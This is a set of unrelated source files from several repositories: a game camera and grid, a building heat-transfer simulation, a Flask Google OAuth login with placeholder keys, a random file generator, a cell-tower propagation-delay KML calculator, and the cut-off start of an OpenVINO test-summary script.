# print("x: {} y: {} right: {} top: {}".format(self.x, self.y, self.right, self.top))
# print("Port size: ({}, {}) zoom: {}".format(self.right - self.x, self.top - self.y, self.zoom))
def move_camera_pos(self, dx, dy):
""" Moves the camera by appending the variables to
the individual coordinates.
"""
self.update_camera_pos(self.x + dx, self.y + dy)
def update_viewport(self):
""" Updates the camera by updating
the viewport of arcade
"""
arcade.set_viewport(self.x, self.right, self.y, self.top)
def handle_pan(self, dx, dy):
""" Handles the camera pan from data gotten from
mouse drag """
# Here, we adjust the pan speed according to the level of zoom too.
zoom_mult = zoom_multiplexer(self.zoom)
self.move_camera_pos(-dx * zoom_mult, -dy * zoom_mult)
def handle_zoom(self, mouse_x, mouse_y, scroll_y):
""" Handles the camera scroll from data gotten from
mouse scroll """
# Must adjust according to where the pointer is.
self.update_zoom(self.zoom + scroll_y * 0.05, mouse_x, mouse_y)
def get_viewport(self):
""" Gets the size of the viewport """
return (self.right - self.x, self.top - self.y)
def reset_zoom(self):
""" Reset the zoom of the camera to 1x """
self.update_zoom(1, conf["screen_width"]/2, conf["screen_height"]/2)
def set_can_zoom(self, state):
self.can_zoom = state
class Grid():
grid_size = 128
def __init__(self, camera):
"""
Detects the camera movement
"""
self.grid_lines = []
self.camera: Camera = camera
self.recreate_grid()
def update(self):
""" Update """
def recreate_grid(self):
""" Recreate the grid from the ground up
        This rebuilds the grid lines with an offset based on the camera position,
        so lines are only drawn inside the camera view, not outside it."""
# Reset the grid lines
self.grid_lines = []
# Recreate the vertical lines
viewport = self.camera.get_viewport()
for i in range(int(viewport[0]) // Grid.grid_size + 2):
self.grid_lines.append([self.camera.x + Grid.grid_size * i - (self.camera.x % Grid.grid_size), self.camera.y + -Grid.grid_size])
self.grid_lines.append([self.camera.x + Grid.grid_size * i - (self.camera.x % Grid.grid_size), self.camera.y + viewport[1] + Grid.grid_size])
# Horizontal lines
for i in range(int(viewport[1]) // Grid.grid_size + 2):
self.grid_lines.append([self.camera.x + -Grid.grid_size, self.camera.y + Grid.grid_size * i - (self.camera.y % Grid.grid_size)])
self.grid_lines.append([self.camera.x + viewport[0] + Grid.grid_size, self.camera.y + Grid.grid_size * i - (self.camera.y % Grid.grid_size)])
def draw_grid(self):
""" Draws the grid based on the configuration """
# Only update grid when camera is moved.
if self.camera.moved:
# Recreate every line grid
self.recreate_grid()
arcade.draw_lines(self.grid_lines, (235, 235, 235))
``` |
{
"source": "Jocelyn-Ting/1020-energy-efficient-building-jt-rm",
"score": 3
} |
#### File: 1020-energy-efficient-building-jt-rm/python code/Building.py
```python
import numpy as np
from scipy import integrate
from Outside import Outside
from Ground import Ground
from Room import Room
from Heater import Heater
from Cooler import Cooler
class Building:
#BUILDING Models the thermodynamics of a building
# Includes a list of Room objects, Heater, and Cooler
def __init__(self,L,W):
        self.rooms = []    # List of room objects
        self.heater = None # Heater object
        self.cooler = None # Cooler object
        self.L = L
        self.W = W
        self.t = 1         # Current time stamp (days)
self.outside = Outside()
self.ground = Ground()
#self.T # vector of temperature of each room at current time step
@property
def T(self):
return [room.T for room in self.rooms]
        # NOTE: potential bug source - verify that this list comprehension behaves as expected
def dTdt(self,t,T):
dTdt = []
#print(t)
for roomidx in range(0,len(self.rooms)):
room = self.rooms[roomidx]
roomdTdt = room.dTdt(t,T)
dTdt.append(roomdTdt)
return dTdt
def addRoom(self,ID,TRange,L,W):
newRoom = Room(ID,TRange,L,W,self)
self.rooms.append(newRoom)
def addHeater(self,Trange,fMax,building):
self.heater = Heater(Trange,fMax,building)
def addCooler(self,Trange,fMax,building):
self.cooler = Cooler(Trange,fMax,building)
def addInteriorWall(self,room1ID,room2ID,A_w,R_eff):
#Adds a wall between two rooms, with surface area of the wall
#equal to A_w, and the effective resistance of the wall as
#R_eff
room1 = next((room for room in self.rooms if room.ID == room1ID),None)
room2 = next((room for room in self.rooms if room.ID == room2ID),None)
room1.addWall(room2,A_w,R_eff)
room2.addWall(room1,A_w,R_eff)
def addExteriorWall(self,roomID,A_w,R_eff):
#Adds a wall separating outside from inside
room = next((room for room in self.rooms if room.ID == roomID),None)
room.addWall(self.outside,A_w,R_eff)
def addRoof(self,roomID,A_r,R_eff):
room = next((room for room in self.rooms if room.ID == roomID),None)
room.addRoof(self.outside,A_r,R_eff)
def addFloor(self,roomID,A_f,R_eff):
room = next((room for room in self.rooms if room.ID == roomID),None)
room.addFloor(self.ground,A_f,R_eff)
```
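The `dTdt` method above is written in the `fun(t, y)` form that `scipy.integrate` solvers expect, which is presumably why `from scipy import integrate` appears in the imports. A minimal standalone sketch of the same pattern, using a single lumped room with hypothetical numbers instead of the full `Building`/`Room` machinery:
```python
from scipy.integrate import solve_ivp

# Hypothetical single lumped room exchanging heat with a fixed outside temperature
rho_air, cv_air = 1.23, 717      # kg m^-3, J kg^-1 K^-1 (same constants Room uses)
V = 5 * 8 * 3                    # room volume in m^3 (L * W * H)
A, R = 24.0, 0.5                 # wall area (m^2) and effective thermal resistance
T_out = 278.0                    # outside temperature (K)

def dTdt(t, T):
    # Conductive heat flow through one wall, in W (same form as Room.getCC)
    dQdt_cc = A * (T_out - T[0]) / R
    # 24*3600 converts K per second into K per day, matching the scaling in Room.dTdt
    return [24 * 3600 / (rho_air * cv_air * V) * dQdt_cc]

sol = solve_ivp(dTdt, t_span=(0.0, 2.0), y0=[295.0])  # integrate over two days
print(sol.y[0, -1])              # the room temperature relaxes towards T_out
```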
#### File: 1020-energy-efficient-building-jt-rm/python code/Ground.py
```python
import pandas as pd
import numpy as np
from CtoK import CtoK
class Ground:
#GROUND Simple class to store the ground temperature
    # Reads data from cambridge_weather.csv when initialized. Like the
# other classes, it stores an internal time step (t), and updates
# by dt whenever Ground.update(dt) is called. It has a property T
# which depends on the current time of the Ground object.
def __init__(self):
self.weather_data = pd.read_csv('cambridge_weather.csv')
def T(self,t):
T=np.interp(t,self.weather_data.iloc[:,0],CtoK(self.weather_data.iloc[:,4]))
return T
```
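A small sketch (hypothetical data, not the real `cambridge_weather.csv`) of what `Ground.T` does: linear interpolation over column 0 (time) and column 4 (ground temperature in Celsius, converted to Kelvin - the assumed behaviour of `CtoK`):
```python
import numpy as np
import pandas as pd

# Stand-in weather table: column 0 is time in days, column 4 is ground temperature in Celsius
weather_data = pd.DataFrame({
    'day':      [0.0, 1.0, 2.0],
    'air_C':    [5.0, 6.0, 4.0],
    'wind':     [3.0, 2.0, 5.0],
    'solar':    [100.0, 120.0, 90.0],
    'ground_C': [8.0, 9.0, 7.0],
})

def ground_T(t):
    # Same call shape as Ground.T; + 273.15 stands in for CtoK (Celsius to Kelvin)
    return np.interp(t, weather_data.iloc[:, 0], weather_data.iloc[:, 4] + 273.15)

print(ground_T(0.5))   # -> 281.65 K (midway between 8 and 9 degC)
```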
#### File: 1020-energy-efficient-building-jt-rm/python code/Room.py
```python
from Outside import Outside
from CtoK import CtoK
from isWorkHours import isWorkHours
class Room:
#ROOM class for thermodynamic simulation
def __init__(self, ID,T_range,L,W,building):
#defining constants
self.rho_air = 1.23 #kg m^-3
self.cp_air = 1004 #J kg^-1 K^-1
self.cv_air = 717 #J kg^-1 K^-1
self.a = 0.9 #absorptivity of room
self.e = 0.9 #emissivity of room
self.sb = 5.67 * 10**-8 #stefan boltzmann constant
self.ID = ID
self.T_range = T_range
self.L = L
self.W = W
self.building = building
self.heater = building.heater
self.cooler = building.cooler
        # Attributes that are not known yet are simply initialized to None here
        self.T=None # Current temperature (K); set to 295 K as the initial condition when the ODE is run
self.H=3 # Height (m)
self.walls = [] # List of structs: [otherside, area, R_eff]
self.floor=None # struct: [ground, area, R]
self.roof=None # struct: [outside, area, R]
@property
def V(self):
# Computes volume of the room
return self.L*self.W*self.H
@property
def SA(self):
# Computes surface area of the room
        return sum([wall['area'] for wall in self.walls]) + self.floor['area'] + self.roof['area']
    def dTdt(self,t,T): # Computes overall dTdt for the room
dQdt_cc = self.getCC(t,T) # Gets conductive/convective heat transfer amt
dQdt_LW_rad = self.getLWRadiation(t,T) # gets LW radiative heat transfer amount
dQdt_SW_rad = self.getSWRadiation(t) # gets SW radiative heat transfer amount
dQdt_internal = self.getInternal(t) # gets internal heat generation rate
dQdt_heater = self.getHeating(t,T) #gets the heating amount for this room
dQdt_cooler = self.getCooling(t,T) #gets the cooling amount for this room
dTdt = (24*3600/(self.rho_air*self.cv_air*self.V))*(dQdt_cc + dQdt_LW_rad + dQdt_SW_rad + dQdt_internal + dQdt_heater + dQdt_cooler)
return dTdt
def getCC(self,t,T):
dQdt_cc = 0
roomTemp = T[self.ID]
for wallidx in range(0,len(self.walls)):
wall = self.walls[wallidx]
if isinstance(wall['otherside'],Outside):
outsideT = wall['otherside'].T(t)
dQdt_cc = dQdt_cc + (wall['area'] * (outsideT - roomTemp)/wall['R'])
elif isinstance(wall['otherside'],Room):
otherRoomT = T[wall['otherside'].ID]
dQdt_cc = dQdt_cc + (wall['area'] * (otherRoomT - roomTemp)/wall['R'])
dQdt_cc = dQdt_cc + self.roof['area']*(self.roof['outside'].T(t) - roomTemp)/self.roof['R']
dQdt_cc = dQdt_cc + self.floor['area']*(self.floor['ground'].T(t) - roomTemp)/self.floor['R']
return dQdt_cc
def getInternal(self,t):
if self.ID == 6:
dQdt_internal = 5000
elif self.ID == 2 and isWorkHours(t):
dQdt_internal = 2000
else:
dQdt_internal = 0
return dQdt_internal
def getLWRadiation(self,t,T):
dQdt_LW_rad = 0
roomTemp = T[self.ID]
for wallidx in range(0,len(self.walls)):
wall = self.walls[wallidx]
if isinstance(wall['otherside'],Outside):
outside = wall['otherside']
dQdt_LW_rad = dQdt_LW_rad + wall['area']*self.sb*(-self.e*(roomTemp**4) \
+ self.a*(outside.T_sky(t)**4))
elif isinstance(wall['otherside'],Room):
otherRoom = wall['otherside']
otherRoomT = T[otherRoom.ID]
dQdt_LW_rad = dQdt_LW_rad + wall['area']*self.sb*(-self.e*(roomTemp**4) \
+ self.a*(otherRoomT**4))
dQdt_LW_rad = dQdt_LW_rad +self.roof['area']*self.sb*(-self.e*(roomTemp**4)\
+ self.a*(self.roof['outside'].T_sky(t)**4))
dQdt_LW_rad = dQdt_LW_rad +self.floor['area']*self.sb*(-self.e*(roomTemp**4)\
+ self.a*(self.floor['ground'].T(t)**4))
return dQdt_LW_rad
def getSWRadiation(self,t):
dQdt_SW_rad = self.roof['area']*self.a*self.roof['outside'].S(t)
return dQdt_SW_rad
def addWall(self,otherside,A_wall,R_eff):
newWall = {'otherside': otherside,'area':A_wall,'R':R_eff}
self.walls.append(newWall)
def addFloor(self,ground,A_floor,R_eff):
self.floor = {'ground':ground,'area':A_floor,'R':R_eff}
def addRoof(self,outside,A_roof,R_eff):
self.roof = {'outside':outside,'area':A_roof,'R':R_eff}
def getHeating(self,t,T):
# Gets the heater's output for time t, converts it
# into units of energy/time
roomTemp = T[self.ID]
[TH,fH] = self.heater.getHeating(t,T)
deltaT = TH - roomTemp
roomFlow = fH[self.ID]
dQdt_heater = self.cp_air * self.rho_air * roomFlow * deltaT
return dQdt_heater
def getCooling(self,t,T):
roomTemp = T[self.ID]
[TC,fC] = self.cooler.getCooling(t,T)
deltaT = TC - roomTemp
roomFlow = fC[self.ID]
dQdt_cooler = self.cp_air * self.rho_air * roomFlow * deltaT
return dQdt_cooler
``` |
{
"source": "jocerfranquiz/email_analytics",
"score": 3
} |
#### File: jocerfranquiz/email_analytics/app.py
```python
from flask import Flask, url_for, redirect, session
from authlib.integrations.flask_client import OAuth
app = Flask(__name__)
app.secret_key = 'YOUR_APP_KEY'
# oauth config
oauth = OAuth(app)
google = oauth.register(
name = 'google',
client_id = 'YOUR_API_ID',
client_secret = 'YOUR_API_SECRET',
access_token_url='https://accounts.google.com/o/oauth2/token',
    access_token_params=None,
authorize_url = 'https://accounts.google.com/o/oauth2/auth',
authorize_params = None,
api_base_url = 'https://www.googleapis.com/oauth2/v1/',
client_kwargs={'scope': 'openid profile email'}
)
@app.route('/')
def hello_world():
email = dict(session).get('email', None)
return f'Hello {email}'
@app.route('/login')
def login():
google = oauth.create_client('google')
redirect_uri = url_for('authorize', _external=True)
return google.authorize_redirect(redirect_uri)
@app.route('/authorize')
def authorize():
google = oauth.create_client('google')
token = google.authorize_access_token()
resp = google.get('userinfo',token=token)
user_info = resp.json()
# do something with the token and profile
session['email'] = user_info['email']
return redirect('/')
@app.route('/logout')
def logout():
for key in list(session.keys()):
session.pop(key)
return redirect('/')
``` |
{
"source": "jocerfranquiz/random-generator-file-folders",
"score": 4
} |
#### File: jocerfranquiz/random-generator-file-folders/data_generate.py
```python
import argparse
import os
import random
import string
import sys
def path_validator(p):
if os.path.isdir(p):
# return the normalized path including safe case sensitivity
return os.path.normpath(os.path.normcase(p))
else:
raise argparse.ArgumentTypeError('Path location incorrect')
def name_size_validator(s):
""" This function validates the folder_name/folder_sizes argument to de format
<name1>,<size1>,<name2>,<size2>..."""
# Warning: this depends on OS's ASCII table definition
LEGAL_CHARS = ('-_.() ' +
string.ascii_uppercase +
string.ascii_lowercase +
string.digits)
l = s.split(',')
# The length of l should be even and names must be different
raw_folder_names = l[::2]
raw_folder_sizes = l[1::2]
if len(set(raw_folder_names)) != len(raw_folder_sizes):
raise argparse.ArgumentTypeError('There is one missing or repeated folder-name/folder-size')
# Taking away illegal chars
folder_names = []
for name in raw_folder_names:
new_name = ''.join(c for c in name if c in LEGAL_CHARS)
if len(new_name) == 0:
raise argparse.ArgumentTypeError("Folder's name contains only illegal characters")
else:
folder_names.append(new_name)
# Validate sizes as integer type
folder_sizes = []
for size in raw_folder_sizes:
try:
folder_sizes.append(int(size))
except Exception as e:
raise argparse.ArgumentTypeError("Folder's SIZE is not an integer")
return dict(zip(folder_names, folder_sizes))
def rand_string():
"""This function generates a random string with random length"""
    # The spec does not say what the max length of the alphanumeric string is,
    # nor whether it should be upper or lower case.
    # Liberties taken on both: 128 max length, mixed upper and lower case
length = random.randint(1, 128)
    # SystemRandom() is more cryptographically secure because it relies on the OS entropy source
return (''.join( random.SystemRandom().choice(
string.ascii_uppercase +
string.ascii_lowercase +
string.digits) for _ in range(length)) + '\n')
def file_filler(path, sub_folder, folder_size, file_size):
    # Creates the files inside the sub-folder
num_file = folder_size // file_size
last_file = folder_size % file_size
for n in range(1,num_file + 1):
try:
file_handle = open(os.path.join(path, sub_folder, 'file' + str(n)), 'w')
acum_file = 0
while acum_file < file_size*1048576:
line = rand_string()
line_size = len(line)
try:
file_handle.write(line)
acum_file += line_size
except Exception as e:
sys.stdout.write(str(e)+'\n')
file_handle.close()
except Exception as e:
sys.stdout.write(str(e)+'\n')
if last_file:
try:
file_handle = open(os.path.join(path, sub_folder, 'file' + str(num_file + 1)), 'w')
acum_file = 0
while acum_file < last_file*1048576:
line = rand_string()
line_size = len(line)
try:
file_handle.write(line)
acum_file += line_size
except Exception as e:
sys.stdout.write(str(e)+'\n')
file_handle.close()
except Exception as e:
sys.stdout.write(str(e)+'\n')
return
def folder_creator(path, folder_names):
    # Create a sub-folder for each folder name passed to the program
try:
for name in folder_names:
os.mkdir(os.path.join(path,name))
return
except Exception as e:
sys.stdout.write(str(e))
sys.exit('\n')
def main(args):
# Verify folder sizes > 0
if min(args.folders[0].values()) <= 0:
sys.stdout.write('Some sub-folder size is zero or less. Quitting now...')
sys.exit('\n')
# Verify file size > 0
if args.size[0] <= 0:
sys.stdout.write('File size is zero or less. Quitting now...')
sys.exit('\n')
# Verify file size <= folder_size
if args.size[0] > min(args.folders[0].values()):
        sys.stdout.write('File size cannot be more than the minimum sub-folder size. Quitting now...')
sys.exit('\n')
# verify the disk space available
fs_stats = os.statvfs(args.path[0])
free_space = fs_stats.f_bavail * fs_stats.f_frsize
projected_space = sum( list( args.folders[0].values() ) )*1048576
ratio = (free_space - projected_space)*1.0/free_space if free_space!=0 else -1
if ratio < 0.1 and ratio >= 0.0:
        sys.stdout.write('After execution more than 90% of the available disk space would be used. Quitting now...')
sys.exit('\n')
elif ratio < 0:
sys.stdout.write('Not enough space available on disk. Quitting now...')
sys.exit('\n')
# Create sub-folders
folder_creator(args.path[0],list(args.folders[0].keys()))
# Create files
for name in args.folders[0]:
file_filler(args.path[0], name, args.folders[0][name], args.size[0])
return
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(description = 'Generate a Master Dataset')
parser.add_argument('path',
metavar='PATH',
type=path_validator,
nargs=1,
default=os.getcwd(),
help='Path to location of Master Dataset. Default is the current working path')
parser.add_argument('size',
metavar='SIZE',
type=int,
default=2,
nargs=1,
help='Max size in MB for files in the Master Dataset')
parser.add_argument('folders',
metavar='SUB-FOLDERS',
type=name_size_validator,
nargs=1,
                        help='Sub-folders in the Master Dataset in the format <name1>,<size1>,<name2>,<size2>... where <name> represents a folder name and <size> represents a size in megabytes')
main(parser.parse_args())
# TODO Validate max num of subfolders
# TODO Add some messages about execution time
``` |
{
"source": "joch182/3G-Huawei-Propagation-Delay-Tool-Google-Earth",
"score": 3
} |
#### File: joch182/3G-Huawei-Propagation-Delay-Tool-Google-Earth/calc.py
```python
import math
import numpy as np
R = 6378.1 #Radius of the Earth in Km
''' From one coordinate point, a given distance and an angle, compute the second coordinate point.
The angleRad variable is usually known as the bearing (in radians) '''
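# getCoordinatePoint below implements the standard great-circle destination-point formula:
#   lat2 = asin( sin(lat1)*cos(d/R) + cos(lat1)*sin(d/R)*cos(theta) )
#   lon2 = lon1 + atan2( sin(theta)*sin(d/R)*cos(lat1), cos(d/R) - sin(lat1)*sin(lat2) )
# where d is the distance in km, R the Earth radius in km and theta the bearing in radians.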
def getCoordinatePoint(originLat, originLon, angleRad, distance):
originLat = np.deg2rad(originLat)
originLon = np.deg2rad(originLon)
lat2 = math.asin(math.sin(originLat)*math.cos(distance/R) + math.cos(originLat)*math.sin(distance/R)*math.cos(angleRad))
lon2 = originLon + math.atan2(math.sin(angleRad)*math.sin(distance/R)*math.cos(originLat), math.cos(distance/R)-math.sin(originLat)*math.sin(lat2))
coord = {
'lat2': np.rad2deg(lat2),
'lon2': np.rad2deg(lon2)
}
return coord
def getCoordinateTP0(originLat, originLon, Azimuth, BW, tpProportion):
splitBW = BW/4
    tpProportion = round(tpProportion * 1500/100,2) #1500 is an estimated scale factor used to show the different TP levels in GE
coordString = str(originLon) + ',' + str(originLat) + ',' + str(tpProportion) + ' '
for i in range(5):
distance = 0.16
angle = Azimuth - (BW/2) + (i*splitBW)
if angle >= 360:
angle = angle - 360
if angle < 0:
angle = angle + 360
genCord = getCoordinatePoint(originLat, originLon, np.deg2rad(angle), distance)
coordString = coordString + str(genCord['lon2']) + ',' + str(genCord['lat2']) + ',' + str(tpProportion) + ' '
coordString = coordString + str(originLon) + ',' + str(originLat) + ',' + str(tpProportion)
return coordString
def getCoordinateTPMoreThan0(originLat, originLon, Azimuth, BW, tpProportion, TPLevel):
splitBW = BW/4
    tpProportion = round(tpProportion * 1500/100,2) #1500 is an estimated scale factor used to show the different TP levels in GE
coordString = ''
#coordString = str(originLon) + ',' + str(originLat) + ',' + str(tpProportion) + ' '
lowerDistance = {
1: 0.16,
2: 0.39,
3: 0.62,
4: 0.86,
5: 1.1,
6: 1.3,
10: 2.3,
16: 3.7,
26: 6,
36: 8.3,
55: 12.8
}
''' We get the points for the lower curve '''
distance = lowerDistance.get(TPLevel, 'Invalid lower TP level')
for i in range(5):
angle = Azimuth - (BW/2) + (i*splitBW)
if angle >= 360:
angle = angle - 360
if angle < 0:
angle = angle + 360
genCord = getCoordinatePoint(originLat, originLon, math.radians(angle), distance)
if i == 0:
origin = genCord
coordString = coordString + str(genCord['lon2']) + ',' + str(genCord['lat2']) + ',' + str(tpProportion) + ' '
higherDistance = {
1: 0.39,
2: 0.62,
3: 0.86,
4: 1.1,
5: 1.3,
6: 2.3,
10: 3.7,
16: 6,
26: 8.3,
36: 12.8,
55: 16
}
''' We get the points for the higher curve '''
distance = higherDistance.get(TPLevel, 'Invalid higher TP level')
for i in reversed(range(5)):
angle = Azimuth - (BW/2) + (i*splitBW)
if angle >= 360:
angle = angle - 360
if angle < 0:
angle = angle + 360
genCord = getCoordinatePoint(originLat, originLon, math.radians(angle), distance)
coordString = coordString + str(genCord['lon2']) + ',' + str(genCord['lat2']) + ',' + str(tpProportion) + ' '
coordString = coordString + str(origin['lon2']) + ',' + str(origin['lat2']) + ',' + str(tpProportion)
return coordString
def generateKMLData(df):
df['Bearing'] = df['Beamwidth'].apply(np.deg2rad)
df['TP_Sum'] = df['VS.TP.UE.0'] + df['VS.TP.UE.1'] + df['VS.TP.UE.2'] + df['VS.TP.UE.3'] + df['VS.TP.UE.4'] + df['VS.TP.UE.5'] + df['VS.TP.UE.6.9'] + df['VS.TP.UE.10.15'] + df['VS.TP.UE.16.25'] + df['VS.TP.UE.26.35'] + df['VS.TP.UE.36.55'] + df['VS.TP.UE.More55']
df['Proportion_TP0'] = round(100 * (df['VS.TP.UE.0']/df['TP_Sum']),2)
df['Proportion_TP1'] = round(100 * (df['VS.TP.UE.1']/df['TP_Sum']),2)
df['Proportion_TP2'] = round(100 * (df['VS.TP.UE.2']/df['TP_Sum']),2)
df['Proportion_TP3'] = round(100 * (df['VS.TP.UE.3']/df['TP_Sum']),2)
df['Proportion_TP4'] = round(100 * (df['VS.TP.UE.4']/df['TP_Sum']),2)
df['Proportion_TP5'] = round(100 * (df['VS.TP.UE.5']/df['TP_Sum']),2)
df['Proportion_TP6.9'] = round(100 * (df['VS.TP.UE.6.9']/df['TP_Sum']),2)
df['Proportion_TP10.15'] = round(100 * (df['VS.TP.UE.10.15']/df['TP_Sum']),2)
df['Proportion_TP16.25'] = round(100 * (df['VS.TP.UE.16.25']/df['TP_Sum']),2)
df['Proportion_TP26.35'] = round(100 * (df['VS.TP.UE.26.35']/df['TP_Sum']),2)
df['Proportion_TP36.55'] = round(100 * (df['VS.TP.UE.36.55']/df['TP_Sum']),2)
df['Proportion_TPMore55'] = round(100 * (df['VS.TP.UE.More55']/df['TP_Sum']),2)
df['Avg.RSCP_TP0'] = df['VS.RSCP.Mean.TP0(dBm)'] - 115
df['Avg.RSCP_TP1'] = df['VS.RSCP.Mean.TP1(dBm)'] - 115
df['Avg.RSCP_TP2'] = df['VS.RSCP.Mean.TP2(dBm)'] - 115
df['Avg.RSCP_TP3'] = df['VS.RSCP.Mean.TP3(dBm)'] - 115
df['Avg.RSCP_TP4'] = df['VS.RSCP.Mean.TP4(dBm)'] - 115
df['Avg.RSCP_TP5'] = df['VS.RSCP.Mean.TP5(dBm)'] - 115
df['Avg.RSCP_TP6.9'] = df['VS.RSCP.Mean.TP6.9(dBm)'] - 115
df['Avg.RSCP_TP10.15'] = df['VS.RSCP.Mean.TP10.15(dBm)'] - 115
df['Avg.RSCP_TP16.25'] = df['VS.RSCP.Mean.TP16.25(dBm)'] - 115
df['Avg.RSCP_TP26.35'] = df['VS.RSCP.Mean.TP26.35(dBm)'] - 115
df['Avg.RSCP_TP36.55'] = df['VS.RSCP.Mean.TP36.55(dBm)'] - 115
df['Avg.RSCP_TPMore55'] = df['VS.RSCP.Mean.TP.More55(dBm)'] - 115
df['Avg.ECNO_TP0'] = round((df['VS.EcNo.Mean.TP0(dB)'] - 49)/2,2)
df['Avg.ECNO_TP1'] = round((df['VS.EcNo.Mean.TP1(dB)'] - 49)/2,2)
df['Avg.ECNO_TP2'] = round((df['VS.EcNo.Mean.TP2(dB)'] - 49)/2,2)
df['Avg.ECNO_TP3'] = round((df['VS.EcNo.Mean.TP3(dB)'] - 49)/2,2)
df['Avg.ECNO_TP4'] = round((df['VS.EcNo.Mean.TP4(dB)'] - 49)/2,2)
df['Avg.ECNO_TP5'] = round((df['VS.EcNo.Mean.TP5(dB)'] - 49)/2,2)
df['Avg.ECNO_TP6.9'] = round((df['VS.EcNo.Mean.TP6.9(dB)'] - 49)/2,2)
df['Avg.ECNO_TP10.15'] = round((df['VS.EcNo.Mean.TP10.15(dB)'] - 49)/2,2)
df['Avg.ECNO_TP16.25'] = round((df['VS.EcNo.Mean.TP16.25(dB)'] - 49)/2,2)
df['Avg.ECNO_TP26.35'] = round((df['VS.EcNo.Mean.TP26.35(dB)'] - 49)/2,2)
df['Avg.ECNO_TP36.55'] = round((df['VS.EcNo.Mean.TP36.55(dB)'] - 49)/2,2)
df['Avg.ECNO_TPMore55'] = round((df['VS.EcNo.Mean.TP.More55(dB)'] - 49)/2,2)
df = df.drop(['VS.TP.UE.0','VS.TP.UE.1','VS.TP.UE.2','VS.TP.UE.3','VS.TP.UE.4','VS.TP.UE.5','VS.TP.UE.6.9','VS.TP.UE.10.15','VS.TP.UE.16.25','VS.TP.UE.26.35','VS.TP.UE.36.55','VS.TP.UE.More55','VS.EcNo.Mean.TP0(dB)','VS.EcNo.Mean.TP1(dB)','VS.EcNo.Mean.TP2(dB)','VS.EcNo.Mean.TP3(dB)','VS.EcNo.Mean.TP4(dB)','VS.EcNo.Mean.TP5(dB)','VS.EcNo.Mean.TP6.9(dB)','VS.EcNo.Mean.TP10.15(dB)','VS.EcNo.Mean.TP16.25(dB)','VS.EcNo.Mean.TP26.35(dB)','VS.EcNo.Mean.TP36.55(dB)','VS.EcNo.Mean.TP.More55(dB)','VS.RSCP.Mean.TP0(dBm)','VS.RSCP.Mean.TP1(dBm)','VS.RSCP.Mean.TP2(dBm)','VS.RSCP.Mean.TP3(dBm)','VS.RSCP.Mean.TP4(dBm)','VS.RSCP.Mean.TP5(dBm)','VS.RSCP.Mean.TP6.9(dBm)','VS.RSCP.Mean.TP10.15(dBm)','VS.RSCP.Mean.TP16.25(dBm)','VS.RSCP.Mean.TP26.35(dBm)','VS.RSCP.Mean.TP36.55(dBm)','VS.RSCP.Mean.TP.More55(dBm)','TP_Sum'], axis=1)
df['Coordinates_TP0'] = df.apply(lambda x: getCoordinateTP0(x['Lat'],x['Lon'],x['Azimuth'],x['Beamwidth'],x['Proportion_TP0']), axis=1)
df['Coordinates_TP1'] = df.apply(lambda x: getCoordinateTPMoreThan0(x['Lat'],x['Lon'],x['Azimuth'],x['Beamwidth'],x['Proportion_TP1'], 1), axis=1)
df['Coordinates_TP2'] = df.apply(lambda x: getCoordinateTPMoreThan0(x['Lat'],x['Lon'],x['Azimuth'],x['Beamwidth'],x['Proportion_TP2'], 2), axis=1)
df['Coordinates_TP3'] = df.apply(lambda x: getCoordinateTPMoreThan0(x['Lat'],x['Lon'],x['Azimuth'],x['Beamwidth'],x['Proportion_TP3'], 3), axis=1)
df['Coordinates_TP4'] = df.apply(lambda x: getCoordinateTPMoreThan0(x['Lat'],x['Lon'],x['Azimuth'],x['Beamwidth'],x['Proportion_TP4'], 4), axis=1)
df['Coordinates_TP5'] = df.apply(lambda x: getCoordinateTPMoreThan0(x['Lat'],x['Lon'],x['Azimuth'],x['Beamwidth'],x['Proportion_TP5'], 5), axis=1)
df['Coordinates_TP6'] = df.apply(lambda x: getCoordinateTPMoreThan0(x['Lat'],x['Lon'],x['Azimuth'],x['Beamwidth'],x['Proportion_TP6.9'], 6), axis=1)
df['Coordinates_TP10'] = df.apply(lambda x: getCoordinateTPMoreThan0(x['Lat'],x['Lon'],x['Azimuth'],x['Beamwidth'],x['Proportion_TP10.15'], 10), axis=1)
df['Coordinates_TP16'] = df.apply(lambda x: getCoordinateTPMoreThan0(x['Lat'],x['Lon'],x['Azimuth'],x['Beamwidth'],x['Proportion_TP16.25'], 16), axis=1)
df['Coordinates_TP26'] = df.apply(lambda x: getCoordinateTPMoreThan0(x['Lat'],x['Lon'],x['Azimuth'],x['Beamwidth'],x['Proportion_TP26.35'], 26), axis=1)
df['Coordinates_TP36'] = df.apply(lambda x: getCoordinateTPMoreThan0(x['Lat'],x['Lon'],x['Azimuth'],x['Beamwidth'],x['Proportion_TP36.55'], 36), axis=1)
df['Coordinates_TP55'] = df.apply(lambda x: getCoordinateTPMoreThan0(x['Lat'],x['Lon'],x['Azimuth'],x['Beamwidth'],x['Proportion_TPMore55'], 55), axis=1)
print(df.head())
return df
``` |
{
"source": "JOCh1958/openvino",
"score": 2
} |
#### File: functional_test_utils/layer_tests_summary/summarize.py
```python
import xml.etree.ElementTree as ET
from jinja2 import Environment, FileSystemLoader
import argparse
import os
from datetime import datetime
parser = argparse.ArgumentParser()
xml_help = """
Paths to xml summary files from layer tests.
In case of intersecting entries, results will
be merged based on the timestamp - the entry from the latest
report is kept.
"""
out_help = "Path where to save html report"
parser.add_argument("--xml", help=xml_help, nargs="*", required=True)
parser.add_argument("--out", help=out_help, default="")
args = parser.parse_args()
verified_operations = [
'Abs-0',
'Acos-0',
'Add-1',
'Asin-0',
'Assign-6',
'AvgPool-1',
'BatchNormInference-5',
'BinaryConvolution-1',
'Broadcast-1',
'Broadcast-3',
'Bucketize-3',
'CTCGreedyDecoder-0',
'CTCGreedyDecoderSeqLen-6',
'Concat-0',
'ConvertLike-1',
'Convolution-1',
'DetectionOutput-0',
'Divide-1',
'ExperimentalDetectronDetectionOutput-6',
'ExperimentalDetectronGenerateProposalsSingleImage-6',
'ExperimentalDetectronPriorGridGenerator-6',
'ExperimentalDetectronROIFeatureExtractor-6',
'ExperimentalDetectronTopKROIs-6',
'GRUSequence-5',
'Gather-1',
'GatherElements-6',
'GatherND-5',
'Gelu-7',
'GroupConvolution-1',
'GroupConvolutionBackpropData-1',
'GRUSequence-5',
'HSigmoid-5',
'HSwish-4',
'HardSigmoid-0',
'Interpolate-4',
'LRN-0',
'LSTMCell-4',
'LSTMSequence-5',
'LogSoftmax-5',
'Loop-5',
'MVN-6',
'MaxPool-1',
'Mish-4',
'Multiply-1',
'NonMaxSuppression-4',
'NonMaxSuppression-5',
'PSROIPooling-0',
'Proposal-0',
'Proposal-4',
'RNNSequence-4',
'ROIAlign-3',
'ROIPooling-0',
'Range-0',
'Range-4',
